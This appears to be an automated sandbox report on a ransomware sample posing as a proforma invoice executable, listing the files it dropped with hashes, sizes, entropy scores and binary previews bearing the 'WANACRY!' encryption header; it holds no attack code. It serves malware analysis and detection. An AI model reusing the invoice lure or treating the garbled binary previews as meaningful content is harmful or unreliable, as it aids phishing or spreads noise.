                                                          MD5:A09D4907451B742ED65ED7F56BFEA222
                                                          SHA1:A2B0106800A429810B95DACB28741876B8F026CB
                                                          SHA-256:306D032CBA47467B4625F8759B0F0E599ECCB1370EA84804B2677176A799828A
                                                          SHA-512:8B3A0EE9B415BC1E4291AB288A699599A9DE869A43DD9083CC6137EC7BCA9ECF043567A086D892E1ED1E5C1D8714DAC3C2707C2F0BE5E8CC6AB82BDF2DB1F4C3
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....*.:..[....+..._y....5[.....+.;q....N...../r...d.]$.}t...a.vO....9-.<?.1..2tJ...R.Ik...m...g.N..T.,......h.t.r...... ...4.d'.....r..lx1.G>....'...b*..9..BO$..M=+..,..MN..7...y!.x.3....~J..........$.F.2.tI_upL.>..<.R.P.....4.....9V..f.K.%.W).U.............B|J..-.< .~.Sq..%........z....A.Nm.tM.g4...d..'s...e{.(.ci=..@...N.E..........;......;..).....WH%...gR_eK{.L5......f1#".I4.V../....k1.3...x...<K...=..P.+...M.%$....q]8..)M.*..i.F.]AU..s..L...z...D...,fG.8g..O.....~..f.j..241..].s7:..=.....^tJ.a._...~v..n.LX"..6u%./.:..[....i|BU.L6*=E.(.......y2.pCx......RY!..=...{.PLO..KT3T.Sa....p..#E...6t..}kU....f.\.gQ.....n).....U..H..Q....p.r...e&.C..R......0......}........v..D.t...&...Z...B4r.-..2"..G.H=).2!.X#.x............|.7.....Q....z.++q..!=...p.1,M..J~... ...q......?Q...CX.L.S....<...rc......a(DL.e...I.../.G...RSl:........$..:e..d.]........)X.....R .i.o.\i`.....3yq|&t..3.~i.Y..=.U.......O-I...De..k.s.k.M..{Q..u...).K.._.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1144
                                                          Entropy (8bit):7.797085962455203
                                                          Encrypted:false
                                                          SSDEEP:24:bkGEnOmQULG8YMNFMgo/Pwq1P7te9pQkOtNwVTdW1ZoOw8f97+Oy3EBZ:bkGWbG8Zdo/YEP7tefIkdW1Zo2+UBZ
                                                          MD5:FB6C21D2B8E615040FFAB1FD5D2EF196
                                                          SHA1:02DBB556BF804E62DA3BEF09C30BA396471B91E1
                                                          SHA-256:FFDB582EE85B367F26FAB8DA240D9CB99BB02362520DDCEA70F0DFB8544DD6E9
                                                          SHA-512:0A126558B9471E8B856FDC1CFCEF7AC34C0C6DD602EFB599E927D9ACB42983D358E23121E6CCF60C40963E3AB72B67E46AEB9B0263A98B0E62B6263D39EC5406
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....&k..4......"...: ......Q..*r..h...[?mv....p(...V./.J.XN.4.....yd.Y..)j`k...y......H..:e,...o`...6#.",...=!.\H...o....E7.$.........J.6...2./8H..#E.."i=T9.bA..|.O.N9......."..>.............bP..lv...T...V.x5......!.RG|.~.-.5.B..L.M\....K.tk..`b.....Q.......z.Z..).i.`.A.@.......^.....5...w.f.{B..Xem..{J.. ....w.;.5.X....1~.5..$. ?m..,A...2.&.9.M)1...."..T.)um(.Ru..\..v..w.)A..K8.uz.....#..m..J.9.[..O..8.....`.k.(...C....m.}.Y...sG.......!E..l..}..#...X.r..`.P.!:_...A..{..._........hdC.0B..SQ:.,...^y_Y.G...~.j...q.......o..m.x....1...i.....P..Tw=.v...".O..........S?b,.. h.`?./Cc....Xf....)...@..@.C.Z.Y.o.^..o.;....,.*.bm.....A.C......)..E.t D>.s.w.?=@*H.......=...R../la.k.w...[...~.#.K....fm......z80.o..`##..|.k.E.fc.R....XPpdZ....Q.....z.G.}...[%.s.X..8..Sv..K.....H....n..e..7..<..rZ}.1.D..U...+.MC.2.W[.<T..{K&...L.wZ.I=..]....Q...w..V...]pjC.......4.@..r....F.l..R!F.....+..eQ......G.2|$$=..}..-..=.Xu.>..FX..r...\...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.296936399603516
                                                          Encrypted:false
                                                          SSDEEP:6:bkEBFXGwnMJdeR0xAn54GDpd4rOj/kvlO6o86wwYRDPuEVZYB/ZSgVY4A:bkEf0JdeRIAq5rObkvl/lwwAxUgnA
                                                          MD5:7B325826DEF18E0AC6AFDEDC7CC9F6B5
                                                          SHA1:D372CBA711E926EEC9678F3978FC4A6860D66E36
                                                          SHA-256:425885B5D4FDAB39BCF435205D70390266FB720174B3B38ACFCCC9C874FD367B
                                                          SHA-512:A23371890B3B4261EFAA9FFFFCE749445B6F98A87D52EE34DD72D7A72C0C0753C6092EB383BC8C8071ACE6CA97E90907C31EAD8C2898255FC61D206A1D32222D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....,....T....}..0Or.....W.M_.U.@n.'...,.zk/./%.......w9..l.ZrvE.(G..wg.Y..a]Q.Y...)/.j..X..g.'dl4.m..._|...9.....U...k.FK..F..]..s.G~..].K#d.n.C4...f.D.\_..ML.Bm2.U...N.yf..o...k..>TV(S......T.).g@.{.7o.p0#`.zZ..5.V.h)v.k%...>P..U.x..rk..i..,!.9....+...........K=.....b.....p.>..'.3.Q..."k--.....k.E...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.240082399737887
                                                          Encrypted:false
                                                          SSDEEP:6:bkEpyHTRqOxnItNU5ArPCqJDQ5ALl1BJ+es1+ewQdLdkXEaJMCgL:bkEul7JcPXNma+Z+ewQrkHkL
                                                          MD5:E7C6FE43B0DFF72BD58DEE653BCF991F
                                                          SHA1:34C458BADAD70EA787D46CCCCE0692C882248F5F
                                                          SHA-256:15E9BE0553E55A7082D28FD5A49ED6E76964B1963D9A62BDD9BB98F928D56458
                                                          SHA-512:E9900E23546F9EBC387CB6EFA4DA2791FF32831450479C63A13C920808422EF225BE94C3A23031876B28734820A471820F426D2B7FDF7C8998E608DA53AAD901
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!..... z.n...Y........(.0........k4.O.eT=......1S....-..o........s&V=..S.!.8..U.!.H../.......d./E.p..q...}......z.<...V.|.@B&..P..&....W8+D...M.dd...x............d....*..T.....h.gy..\VhX5e...z..=6..P.X....";.].9...1.....@........-.^^l.....,8.ae8?..m....+..........m..x.>.......&.......C...i..;.....Y..p....g.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.228360274730553
                                                          Encrypted:false
                                                          SSDEEP:6:bkEKpZC6H6UPCNzOVDNcVspzAffscPCYdWOAjeJwch03ihbffx:bkEyZC6fCNzOVDNcVspXfYcvjeJZd7fx
                                                          MD5:AAC4E0B9E30CE4425E8BE472E0F983C6
                                                          SHA1:3C909081A50E092E68AE11AFED2357C688D65A51
                                                          SHA-256:8201E808030D5F90136D205F6842A07E30D42CB34D3C5FD30233B2C15BB7FC45
                                                          SHA-512:54EFCBAA3333B2BAD4794DFBEAD9132C8D7313EF7AACC6B712618D9A97D6C90B1ABD652EBF5C472475E7969491AC92D2C90E7C6E5D0E974D1C34E47221B95B53
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....e.3.......'..L.L:.N%..KcY..Hw.....;...M.....H0..I.k..e.aO'.m.....&.cj...5g......C..smN.a...H?Wm6.T..p..%.,7._...6........,*&..+.s....8/..Zn8..>..1..3.......T6/.rea.1<B.h...n....I.........%..\p...w7..6..*...9..F.....\q.9f.%.E...}..9~....>j/..V.....+.........0.c.}.....e.yu..|........0^.0...C.E.[.b.2.I.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.3210709939964875
                                                          Encrypted:false
                                                          SSDEEP:6:bkEvSb8pp6ZHmVS+PoKZle0scizt0weYL9MTPNAGaVBn5tBSWlZqPFab81cFylO5:bkEvM8vmHmVVPoilkXGwea9MTPSDnJSi
                                                          MD5:B0EA714C735F93FDA7A11689FABDF0C5
                                                          SHA1:CBFBCF316F891449DAE587D78DDA11131FDDACC8
                                                          SHA-256:C7DDBC715A1D5894B32C243111FDD3374704BF67B4C7239F7D5A4A763AC768E9
                                                          SHA-512:0A9156E2B233A76C83F800834196B84341C4B03F4D9777D771DA5CCCA8C2E1A39C7F836BEE3A204836F91B722CCC3597A12ACE5999D4D6F465A60B1776A99EDE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Y..C6...u.g..&.n.k.4.....e.MF.B2_k....h1u.%..5.A...\C..0....S.z../@..=.n...4...?8li(...9M.(..2[ja..L..Y.y.hy.J..=QO...g{...,....uOH#b..X..K... ..q......%35....F)>0...N$>T.>.v....0...L$.Pv..j...4.?s.....R.i.-..p.....\|.0...d~`......g|...Y-Q..hX.....+........b$.q.....m.&...SL*..Nh.....~ .6_.I...lQP..@..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.207597576469431
                                                          Encrypted:false
                                                          SSDEEP:6:bkEdKo+SgF2dONFUFG/vqFLRL7YBrgG2bv15gutm0yIEYXrKXEkimbsI:bkEIRUFGaxmrl2tvuUkimbp
                                                          MD5:5F1FEDC2046B7A5C06283DC2539CAC18
                                                          SHA1:86057B08C36CA84389C5786CD6BA7509273A4F48
                                                          SHA-256:184EEA658EA5BD460F4AD46A0DEBED275E3C4F87CA25E00C68CEAC62F890325D
                                                          SHA-512:48968CCBA8CC544C16CD6D3F0210BA2063AAAB1E5F05663244932FFDCDDC2DAA8D4285AAD5502C132795E802765EFBF40FF6BA3F2F88ED4DDBA2096F8B180E35
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....<...4..8=.......Ry....38.?6..V3q@..`x...!.9.%......<.....T!.M...E...........g....>l...r`)..... #@.........qn.t..5O.......!.$.P.Z....\..._i....]?s...R..`.6v..6.... ..=n.%..p.0.....U.......G...<.\L'.T..pE..,r..N%>..W...V,.Z.C...8...:.k.':.Mo....+.......c.!_.-q...Z...f.(l7=..$....@5....:.@0%:....?|C..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20552
                                                          Entropy (8bit):7.991750473485933
                                                          Encrypted:true
                                                          SSDEEP:384:wRnvf+7uEOnvGnwE+n/RU1oIGFOAEM+W/7Ot/UX0I2QD6zrYDdbP64fyFHB/:8nXg3SvK+nBIMOAEu5OQD6zrYDdriHB/
                                                          MD5:DD77CD5BE768BF89D8A0AF4684F5775C
                                                          SHA1:61486BED9503C284FD394C0AD98E170227529894
                                                          SHA-256:2E66137E1607FBC0F67EF74D3A5C23CF4656ECE36CA9A07E76CA31121E82806C
                                                          SHA-512:CB374C98DF77860F95AB0C1A098AC479A71BB28B43500AED75E8D177677A2E73549D1DD2147FBE17C68E8E3C8E9E74F7A4378B35294163CEE2553AD077C531DE
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......C.._....%.Q...I.7'......c.5...h}....|.......zxV.)n^..h....6...F.L.I.6fG.Hp.....MT..|..;.f..&..~..W.....%.-...).k..S..1.".S..9jdk..K..3.+74U.....n..]3......r...H.7.W...^1..w........".E.P..$/.../#.....O..V"V.....E..@^.!.K.P..M.S..w^.(A.[.,DT.....$O..........0H."....}.9..b.CX.vT...G..]..;..56...k........8'..).f!.X.._..=."v.J......xB....b..p.y....8..ZM...I.A.]>.F[Z.4..<B.t..1.G..z..<.....|.Wx.9..'...#......+"..$O`kZ...M.P...G7=.!..]DE.Q....;&..}...8J...?......l.....a..wS.%../2E.@...E...n.$...7...P~Dv$.E.......|..*fDNac...\.....<b.-X.. .t......`."...>..l...B.R....i...x.+......|...{.l~Y+....6.S..h>kt .]..N.?.EJ..$.Y..Au.?.[....'.E....8,IjZj..KJ@U.&i.*^..m..0...,...'..P.S..w#@.....F... .--..q.I.}..4../.[L...w)...7.).{]9..q)....6..x..j.....Y..D.".....?.[G.\A.a....{.X,..d.....'...<.>..............&}....7.]pb...Ph....;G"0.v6.)G....q.>*.C....D.a73...q$....z.9[....N.#..X.....(2......<H..."......*..26i.v..Z..2..mp.....;....'.-.6...<cd...j
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):13880
                                                          Entropy (8bit):7.988528808361626
                                                          Encrypted:false
                                                          SSDEEP:384:uI8NcPmHqm2Q+VZsmK9BSYteuZxhDEYKR5K:uIlPCkTlK9BSYt9HhwYKR5K
                                                          MD5:84DC34012611EFCAAA15CD5D7D5923F3
                                                          SHA1:0BCF8B2B568D77484F7F3A0CE04C0B9C491463F5
                                                          SHA-256:3C5AD22801C9F713D5F4D9BF3ECE4DE1491B468CC8BDA606C6243BFACB0EB208
                                                          SHA-512:2E45C4358AE92AD259856AB348E6877A118D4B0262D46D253FC15F597F7A8C8B325FF72DE0E128EED3BB5C5DA8FDC48353B8AB67DE246B4ABF1E06E5A088B15F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....h..}^...{.../.....+.-J..7..MM...*......?...N..g;..^f.8..;...)W..F..@.....qw....ND...#K.:.l.zd.3B..._...`.D..s.n.`}.78...9=..n..m..MF.p*].!g.E.X.....B5...K...B..H.a>....H....-> .h....J.(^C.3..|.....q|<.[...W."...d.r3c.zB...S-..F.-.k....#Ka{..u......5.............y.....c.?.g.;.h..h.W*..e.t..6"M~...'........k\H.....E...|F.1y._PvP..B.4.R.ak.............O...M..jV(H.f..L...8.W..."b!.8.Q..t..*..&...T...".M.4.cg..0T..pe.s>.h.......&m..\..z)_.w...hBRh.......AV.7..X<O.8....r.}....m..0..V.I"?(+..o.:8........%-......V.vi......a0,......+.W.N..."......G..&..b.8.5....9...s].B..s..B"...3n.@e."......p...E,...1.C..#.......H.6....nw.'......5tal'.0.1...P.._......I.Iq...}.8O...6.#..)....... ..........._..r....`"...K..nV......g...4..!.}. h._..7.A.....9.......$.._....q.4......A.^...a..\&..$o.._..I=v.[.@..Fo'.S.|VZ..Sh?.0.......3.5.t.x.qG.g.l....c.....m......T_...O.s...q....V.#l...^k}xh....V.'.....L.~.$.!...&.YV...JE..yLGG.L..s...b1.Gc.p..Mz.gXy21*....a{)5..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):103448
                                                          Entropy (8bit):7.9982326499659235
                                                          Encrypted:true
                                                          SSDEEP:3072:+ANhnKHkpkHmqU3MPWgEfHWlOh3vHjfACuVd9MT3PgIPQC:FQkUBZOXfHWlOtvECuqjVYC
                                                          MD5:7CEFA73740FD581DBEC9630B2C83C75B
                                                          SHA1:807DE65C371A7072E6CB0E2044200F4815D280D8
                                                          SHA-256:3222621D67699D76B25DB663E50AC02CD26E2ABEF8E8ABBC86012CFA03BDBE49
                                                          SHA-512:1A2835D77A175BFED1CF04F5FD3FD1C3EF68F7A13B5FEF072E8D8C1E9E5CFBB437FD9ACE2D6879FE1ADF6F41DEF450F855FE22528B1C4B8B184DE9AD0C376CF4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....l...|.B.H....P$.4XD..........M........d.^.p....K..<....9a8ov.M.}..p..v.{*....p>p....#I....q..n....D8].@:.......k.#&.kx*.q0-.?...b.W.}.n.`.D.........WhA.u.9L..........K...ol.ua...Td&.:Z.m`..)_.J.....L./......w...1N./........*7g....)jh...Q............7.=\.[po:...C.?m==......-P...C..<.Y,.7<...;Z.Z..F.......x..R.IO6....}.....6Q..g.zt<Po. XYb^]hD...U........:L.#)...8..4.$K.\D.n.....y.y..U....gg..&....zh:....p...j..a.'......d..w...5<...O.....uq/G{....jr.%..)..<.F2.Zc-zcU=.*..[.u..Zw..!.......0h...Q.=.Q.G./wP.........>.P...C....Q..^.^m.s.*,Z".k.....2. .....g]4..#..[...S...G...&..k...;Q.U..}.........l..x.j..y.....0c..........`...X..Xr.../y7]..BG......x..RoB...E.a..]....1...?2...~..HD.6.u0-a.h..=....q%..J.9..0..#..?....+.w../..q.j.d'UJ.aK.1..K*.h&..}6DJe...z)...L/.W......W,..Z#|...-......'..h.N..RG..^h...c.'.s.=8...xF.....\.+.;.&..E./\..X.|<..)~......5-n...G(n1......0..5..=a.Zj. X.F...9....7..>..L7v|O$.:f...z....=.s.|....0
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):24104
                                                          Entropy (8bit):7.992340761609319
                                                          Encrypted:true
                                                          SSDEEP:384:fGqpf9Wib5O/MWai09T1eG7/WU7+O6ddRjYq9PFlz653jGSCVkmiIyJ:fGqpf9/8/Mvi0fN7+O6l79lE3LUZTyJ
                                                          MD5:23FC1FD62BC7F73BF1B0E52D07256472
                                                          SHA1:118482726F2A7839B3DA9B8208F565FB843C9FA9
                                                          SHA-256:013AB0B2E5A66A7F389668CD989088A85C91A2FD4787B7935588714B3E5652D9
                                                          SHA-512:9F6079838A9160FF5E3AF32946CF5B113F527A92C3C0C9A54A710F452CB55D48377F7B53F45D40D3FA75F6152734CB44EBBC5941AAD3CA61B559DAC04A402938
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......xj.(......%(.w.p...;.....E...7.....?....K...7.....?`R4.>.....G...cw.........e.V....[..v.Y..Xl..7.>'em.P..N..m.RC.....dX?=.....4T.w;_...F.vK..G.O.L.!...4ZF.xc]y.G...[).i.e.1s.......u.s..Z....U.U:I?.h&...P.%......}..dR>y.3I.....DqV..V9o...?......]......}.s..b)..)...u&"{.mu]}.. ....So.3N...y.%....w{T...u..x.@........B.h........2..X.Xe......,.. h......s6{==+.d..[.2....aA...Rq...f.^.<.K.s..EB...t....c.k..P8b3......;.i|H..Gr........0Oi.t.q(;.....^.&....J.e4..........<s.H`.$N. G.u.R.s......c..."/..I...)G.|t..s..`.py".94.+B.*.&....ivH.v|g...x..{.{..\...H.!t.:..T.h.....{.Z,,z..k...r....3 >.l.y...TR.;gT?..MvGC..#d.m......L?....|.^}.....|..6....|k.n.my.p.~.UX.KU.g.h~..XNk............<B.q.L.^.,P.Q...C....l+....r.C...J...4.I..Z.X....>E.V.h%...j6..L#%c..l..dZ.#.Gi..gj....lTj9.3.9...XL.K.L.+.Y.>.t...Q..QE.....#eWU..9.o..4.Y.4....R..oQ.+.k{.ZW...T1...i!*.....f.............oh...w...3..F.A]p.u.ZY..,....P*.Tj2.....G..[..G......&.S.).
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.276255109927344
                                                          Encrypted:false
                                                          SSDEEP:6:bkEt2SlHuGV4GTR8ozXmTIfAakkTtS/qxOi1Us7+kgGqEPF3t4bkS1OtkO:bkEkSkGVHTRpzXmTa8kTtS/qpg/Et3K+
                                                          MD5:762DDB59EDB8C8AE063C171A0281F51B
                                                          SHA1:96DA47812361488A4B6DD2768957CFB1A45D489B
                                                          SHA-256:B6E23A634DEE22534683B7359F54CB35BFCB74A7D54F187856F0824E58E556F1
                                                          SHA-512:DA223F13AAEBAE2E9691699BF052FED818A5940B9D8EB6CD1891D4FEC12DFB7D684FC86493FA5D848C6E9AACB5D722402DB22A1AB9D8148971BA7039A6FE8E04
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Y$.._..Q...'.0... ...c..w<...IS...r._w..vx2{.fk.((<.%|H...C....?Py...BT.....2.|jk.,2.....4.M..yx....[9....y..].m.W..J..Z.........+...J......Y....)...q...-..z:..3..!..r.......a.8.j=A...Y$*......[h......H.D.6.......a.F.A.>...s.T#..q..5hR..&.@yK.....+.......W..e.I..i.>(.e.J../.........?..f.0......et.P<w
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.191832093003917
                                                          Encrypted:false
                                                          SSDEEP:6:bkEUOhstQpTz8U4rWKMF699ALnQrQxk6hcrGo/UEZyNmIKGzSck8+mgcBeY:bkEUOhswXKraQPC+Qxk6erGo/UOehKhS
                                                          MD5:6F90BCB027F5796DAA7132DA36D46CD6
                                                          SHA1:CA802578FEB029FEF34925CFFD7A917D4B7233DF
                                                          SHA-256:0C6F929840E50B8D1B687283F6F651733F755737D9515806E443A51BA3D90003
                                                          SHA-512:6751B92DA72AB181DC9F3C7ACF3B483CBF9E1F75ABA31140211A9401DDD7AB1E58EF5C548E79B98337E5FFABD710E44F403FD0609FB8C2EA7EEF4D2E4D8809FD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!...........D..3'...I\.C......`...~.'i*..P....T2......'...gVK 7N.Y.}90.s.Bu.>:.:?.5..A'.)q ...q}.yrm...<..M2..............zT..-.*E..GV.N.....N..ST...S.........}....... .#.......u.' =.. ...?}8D3d...G..(...>V{./.=...^........K[..?.g.Gv...|...l.n....6H.D....+.......)..*...qU.L3#...4.N-P|._.! ..`e^C3N.i.YX....Q.\.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):328
                                                          Entropy (8bit):7.263715067432053
                                                          Encrypted:false
                                                          SSDEEP:6:bkEuqCmVIzTibWTH+/q0rEmMZ5biXN7SF3HTOUXdYnMfun:bkE4mVciqL+/JILu1ShHTOUNWn
                                                          MD5:EE29DE28731D4E9385AE4E8E9A12083C
                                                          SHA1:B256F898E0548C373B82B09FEFDCE2D168D21BDC
                                                          SHA-256:5C6F1C38F9DDD35985F38156244468148E49E7F3767559EA12E00B5C01096323
                                                          SHA-512:42F60E171CC82E4D4A083890B9E8F4B958255C1A24260653459131E245C0292DEB4B70D88DD14B030C90B01CB4D3254FCEB093921A56B66BED060CD739EC1B55
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....R..?.24.,p.....N.....n*,..u...M.....).d.q>r_..p.....%.."V..{=.X....a...-.,..7...u..&.U...o..8wR.....cl.....W.k.o...o..b.8..F.I.d......>'.,.=.......Z+...T6.*.2.....~O..--..x.Y.........M..c..L...8..{j.....z...........).M.2]7....C&t..U'e..`zK....+...........4'B!.."...."..,V.^g......h...&e)A.~..@.}.!.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):70296
                                                          Entropy (8bit):7.997334638188674
                                                          Encrypted:true
                                                          SSDEEP:1536:wErGyweNefdAXdEFg+vSIOtJ4p1D6iWMS6Zhnkzz3yIH:wuNefdcdCgeSrJi1WRl6Zhknyq
                                                          MD5:BEA3DB6B1F2212643A631F3883D16976
                                                          SHA1:1D0E260E68D94B73A51CABA26372109B7F7DFF85
                                                          SHA-256:1990A396E85661835B040C7B3071679FFCFD549ACCE6C1FA34EF0EB5882C11D4
                                                          SHA-512:E92CDBDF251795FD4B86BF7799DA66D042745FA3DB5B34E7AD4C45AA761FFF1F2383F4F2F222CB3EA98EFC01B669EFFAE6A9A3F3A5034AE14D80F67340399686
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Q..#......i*Q...F]C.2q.1c.:lQ.E...cEqI..yV.O..?...I..L.....3.0.L........t.....|.?......=..Oy.~.q.W.v........Wx..6.POXQ.k....FV..8......(l_..v.j.p......e.U........CS"a.i.CDP\.....D.(.....s.4..3p...[...X.s.Vj>......P.......&.F9....IB).>N.9....w........N.....^.[....R..G..f..G.`.lJ.=.g.t...N..0..HJ..U...c..0.d.peTu...u....b.4A..z......_Y...,.K...x1.8....BN.....z..S.~.1.2...J[..GDm...F.CN5.|.}......'b&.k..g....Dh....})w..0h..K..*..g6.e..~g........W..W.<u./YW........7}..3..q&TMe.U..c.....8aI.`I..z.}.JK.N+9.#..".e.0.-.uEY.V.b..).0U.M...+.....[..&....AzK"{..N....f./.$.a<.3..[..'.[.kR....4..=....R..`.oq5.m...r...@.*...b...... X..... z...A...d.;>..kU(.....t0...vQ..s.r.....l....w.e:....D.._r.......3 .Y...+..Zou......0n.e..Q.....m..^..,".D..e...b.....'.r...#....T...0....y..n..#J..+.@sC.y....L....l..D...,C+.....a..S.u..PEZ..\'.|>..C....f+V.0.OH...yO..ZC.iZ.K.\$....16..+.9.B.}.....P.L...Gb.&.).zS5....9.. .w..r.....;.8....49.U..3...1.....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1573144
                                                          Entropy (8bit):7.999897354332129
                                                          Encrypted:true
                                                          SSDEEP:24576:zCBIw3sFgFLCg1n/ZsqJ3kyvwgiOTwSuFrzygcyoDtEzbCMZGtJ7Ew7CaXeHcTXT:Q7SAmolOMEpegBoZQZz3aXe8xVhALC
                                                          MD5:3DA3BFEAF3D65F43A71AC800408B7C6A
                                                          SHA1:0DF262408AFD711832D4AC3B5DE7C82B31B896DA
                                                          SHA-256:10B101362E286A13EFC12E5627D6EB17D3ACF4A9C5035B81A13D1068588813D8
                                                          SHA-512:50A0D38BD518699ABB2F5C4B36A8B0A33949FB82197A9C95C98E15B2CC84B418DA6D6F4037A4BB9EC915700C41E2D3555AFDC49C73D44748431CA66E25FA69B4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!......]P.L.. /U."..n...#39}....i..:.....'.q.PU.4..++.....J^.q'.>.5.%..K.H..W...n....G.i=.Hi.R.s..@.$i\.]fh'...e`vL.0..B......S..9.v!..Y>.0...`?.u..F..J..n8a..!...N9D-ihaJ....../#..I|1.q..1....9.1.....z.)al<..J.s`._Ah==t..`n..S...L...U./PM._.W.2.c.?.O.............0..../..;8./...3..$m.'3l..X.t./.D....W_.e.}#.I).-.(9.R+<|..#|..ZZ.g.n.}q.dDn..E9.V.}`..~...Ll."......!sfS...1kb...h](.u..*q......^..H..?X...n.......,..........t...g%R..,...j...u...2.Z.....4l.....\.2.&S.J.@h-......'..z:....t.D.m.<...g........L...m5.f-..[.<...Y.t.\.>.hF....e...H*(..s...../-1=.?:.K9.^....}.._u....Q.Z......v.^..h|.~~....8....S.d.x.?......?fOV.@u9o.'y...L..7q.H...p...M.j..B{1.%.dI..F[wUbrR|u.!..+.R.?.*.Xg.t.....#...E......zGq..YR"..P.%.-.B.n..WHn[....;..7^u...h....{ .G.[@.E..F.Q....P..S..........)...[p.J...3G..V......U7...MOt.u_*p...l.=;|...l.....*#..(..o....{u..FV...g&.......i..x..e.......g.. .t..}..S....0...n.........l.*R...4`X>..q[.Q[....8.#.._....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2097432
                                                          Entropy (8bit):7.999904518981081
                                                          Encrypted:true
                                                          SSDEEP:49152:hmcI6hWlqaFrpRU4zg3G40dBCNu1VwTAI7zv/iS5NHIaQFxsqDuvwmjSPZ:hj0lqSRUB370m41VwVD//5GaQLsux
                                                          MD5:EACA3463526540A51B643E4A1CFC4B51
                                                          SHA1:4211C9BB3CC9CA950A26FF4C7DC6766B3BC97380
                                                          SHA-256:D40E696002855F8550199411F84122BEF79EB548B9F9D4B453E86B0FA1D99A89
                                                          SHA-512:2D264A96BFF33066593C5DFF6188FE8EF2910B61F9C4B7AD5B43E7F9B8083B2F8D4A67A542950C26426242B8AFC37E113B63C685A8E9016376780423CB35EB41
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....u..X3.k.).(r..ClHA.P..mTJ<.........(....QO..$.?gs.RO._..B...._..3...2..h..<..l:H~y..s/.[{..^W.m....B.]..f..6]..LQ....k....ZWV*..?...0g.XZ...;M...:..h.T.J.2^.UM..[...O....q.u..b.m..&MdP...T.....|.A..X.......K.-......H......Nm.t...D..;B...;...... ...........*Kj.$L..6?`.v..}|T..<.....}...Q....=.4.6..........h..G.R-........:..tN...........u.v.....L....)......R.^..d_n.c...b...8.m..."rL)\..Q.,.....l..._t.*........ .P.o;dKF.F...w2B..nc..?D.....0s...H.......0.........(.U.V......(..[.cQ/.X4.k;(......$<..9.R..;..^}O..E..+..r..w..j.WB=..:#S.).....g......f.....b....\....(......g...hn..._....{/.p....R.......,.[m...,ze..H...bM]..n..6q.4.Tl.$.B..}..p@r._.......W._C...tka.YC...xV..h.........4f.......H......n..V.g..N....@.1......T....X....E~..&.^M^.......w.M..D.Ll$,P,.9!l.4.K1...0.2~]..U,.j...H.@#.@.=m].owO.}l`...;Q..y$.....,...zB.}"_.Q*z1.$.......F.o...:.u.X..a{.,..cx.....v.1fI.)..]z.J..1af(5.?..22W2.9..R.....]....9..r2.`.j
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):37464
                                                          Entropy (8bit):7.994736978354738
                                                          Encrypted:true
